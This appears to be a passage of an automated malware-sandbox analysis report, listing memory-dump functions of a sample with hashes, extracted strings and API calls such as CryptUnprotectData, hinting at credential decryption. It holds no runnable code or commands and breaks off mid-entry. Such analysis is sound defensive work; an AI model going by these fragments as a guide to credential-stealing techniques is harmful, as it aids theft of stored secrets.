                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: ByteCharCreateInstanceMultiWide
                                        • String ID:
                                        • API String ID: 123533781-0
                                        • Opcode ID: 9717b9d2d3f1f70376a21d224ba21de3388b18fe49c9807f3d8e754724465ad1
                                        • Instruction ID: 16e1a4215ef81328b8ee601acd60e438fbcdb42655614a88e74053ed6db9821c
                                        • Opcode Fuzzy Hash: 9717b9d2d3f1f70376a21d224ba21de3388b18fe49c9807f3d8e754724465ad1
                                        • Instruction Fuzzy Hash: F941E870A40A289FDB24DB58CC95F9BB7B5BB48702F4041D8E618E72E0D7B1AE85CF50
                                        APIs
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 0018A2D4
                                        • LocalAlloc.KERNEL32(00000040,00000000), ref: 0018A2F3
                                        • LocalFree.KERNEL32(?), ref: 0018A323
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Local$AllocCryptDataFreeUnprotect
                                        • String ID:
                                        • API String ID: 2068576380-0
                                        • Opcode ID: ea988fa2bdf2db482a739a7c65bace58341c93924dc0d9bb5bf27150480889f5
                                        • Instruction ID: 284c78656c2e43d3b015bb2783965e1c107a6dd1fe5d95b0d997e31dd194a5e0
                                        • Opcode Fuzzy Hash: ea988fa2bdf2db482a739a7c65bace58341c93924dc0d9bb5bf27150480889f5
                                        • Instruction Fuzzy Hash: 161193B8A00209AFDB04DFA4D984AAEB7B5FF89301F104569FD15A7350D770AA50CF61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: Q;$L)
                                        • API String ID: 0-847948008
                                        • Opcode ID: 87f84542222621e3e68ea86fba506a9649eb7abd42fe3480aaabdda0b099d7e1
                                        • Instruction ID: 8d39e81bd7ab55c70629e9828fd9c3bde5b6437199f6409840486f3112149886
                                        • Opcode Fuzzy Hash: 87f84542222621e3e68ea86fba506a9649eb7abd42fe3480aaabdda0b099d7e1
                                        • Instruction Fuzzy Hash: 40B207F3A0C2009FE304AE2DEC8567ABBE5EF94720F1A493DEAC4C7744E67558058697
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ?$__ZN
                                        • API String ID: 0-1427190319
                                        • Opcode ID: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction ID: fdeeee25bcce8288b5986953855cace6b3ab89a00f66bd75d8652b8f4a797337
                                        • Opcode Fuzzy Hash: 5979ebcfade6a94da10809392b5ca83137eebb76b9c6aa0d0269130114abb242
                                        • Instruction Fuzzy Hash: 407205B2908B189BD718CF18C89067AB7E3BFD5320F598A1DF7A59B291D3709C419B81
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 3Gyv$3Gyv
                                        • API String ID: 0-2465663761
                                        • Opcode ID: 9ee9c7ed6020d9b159c1d371862e3ed443d1e6740680111e8b7d99e453b91e7f
                                        • Instruction ID: 496d55064563c5763a207507d7bc1caed912a92991acd09f8924339eebab1ec7
                                        • Opcode Fuzzy Hash: 9ee9c7ed6020d9b159c1d371862e3ed443d1e6740680111e8b7d99e453b91e7f
                                        • Instruction Fuzzy Hash: 8F81F8B260C2009FE714AF29EC41B7FB7E6EBD4720F25853EE6C6C2744EA3548029657
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: Fi[o$u\o
                                        • API String ID: 0-139046059
                                        • Opcode ID: 4acdff5de05ca1d2e54fb3c333ac54185749f9557dc30cae9ea8d06bdb24c4bb
                                        • Instruction ID: 43d54b590c48cfc78250d7aeaad05b708d5145d15245972211a2521938b0d10b
                                        • Opcode Fuzzy Hash: 4acdff5de05ca1d2e54fb3c333ac54185749f9557dc30cae9ea8d06bdb24c4bb
                                        • Instruction Fuzzy Hash: FB518CF3E041145BF318592DDC1477AB696DFE4720F2B823DEA8A57784D87A9C0582C7
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: xn--
                                        • API String ID: 0-2826155999
                                        • Opcode ID: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction ID: 63dc35f18ddf06665d87a8e60ba4ccbd68cc6cc76b3f13c2c8120819c5592184
                                        • Opcode Fuzzy Hash: 7df6ecad3ed0aeae1596bd114aa1f7039c484854ff8b1381d6cb73b44afb5762
                                        • Instruction Fuzzy Hash: 00A203B2D042688AEF18CB68C8A03FDB7B1EF55300F1842ABD5567B381E7759E85DB50
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction ID: 3019dd0163976a8543115e410aeecbaceee86dcafd767f31f2057982e4c35fc1
                                        • Opcode Fuzzy Hash: c14b47d2e213c3a0e8374cf111387a659401d06af651524ed7eee9bee9842815
                                        • Instruction Fuzzy Hash: 80E1CF316083459FCB25DF28C8917AEB7E2EF89300F554A2EE5D99B391D7319845CB82
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: __aulldiv
                                        • String ID:
                                        • API String ID: 3732870572-0
                                        • Opcode ID: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction ID: bc13bf290b363656639844ecbfff138d44c682aca7757dfae079c2b3ab0f97c7
                                        • Opcode Fuzzy Hash: 83317d89dfdf25b5cbfc261f48c526b848a7f8a57d589ef9335097789b789f81
                                        • Instruction Fuzzy Hash: 90E1C4316087059FCB24CF18C8917AEB7E2EFD9310F15892EE98A9B351D730AC45CB46
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: UNC\
                                        • API String ID: 0-505053535
                                        • Opcode ID: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction ID: 0049e0f814cb7329ff0e969648a0ed13a615db7cf7c54097ef84c952a5714b35
                                        • Opcode Fuzzy Hash: f944912daca86eef5da2b02659a6c861781d9d5d66b239bded02d895f8a825b7
                                        • Instruction Fuzzy Hash: 50E14D71D04AE58FEB14CF1AC8843BEBBF2AB85314F198169D4A45F2D2D7358D46CB90
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 3;$g
                                        • API String ID: 0-3386546047
                                        • Opcode ID: a72af3125bb3e443bece511a9bcd19e5913575f3ee11a26e9820a4beed985064
                                        • Instruction ID: 6dcd03671a0a85eb4321abc6ea476657b06a9dc828d2623020556a130967d03a
                                        • Opcode Fuzzy Hash: a72af3125bb3e443bece511a9bcd19e5913575f3ee11a26e9820a4beed985064
                                        • Instruction Fuzzy Hash: F4712DF390C6048BE300BE6DEC8536ABBD5EBD4360F1A863DDAC8C7344E97948558786
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: hIsz
                                        • API String ID: 0-341771432
                                        • Opcode ID: 49bdae8f5e25b3d8d297e750d8e9e45ae309721ca878205308ee83a86506fb37
                                        • Instruction ID: 4ae1ca918e9ea0d28b8fa485d53d2e2e51c998452371adc481580fb8be97b9a5
                                        • Opcode Fuzzy Hash: 49bdae8f5e25b3d8d297e750d8e9e45ae309721ca878205308ee83a86506fb37
                                        • Instruction Fuzzy Hash: 37510AB36183145FF3086D3CDC957B6B7D9DB84720F1A493EEAC5D7784E93958004686
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmp
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: QvKF
                                        • API String ID: 0-2394673490
                                        • Opcode ID: fa8f18ab107bc81f47f28cc1c1be182337819a77b99bd50b2dce41a4c4f6f8ac
                                        • Instruction ID: 4afadfed54e88437b66e2b86f06fa1309a2903b63a0f9ebe4b440d7a73f40ed9
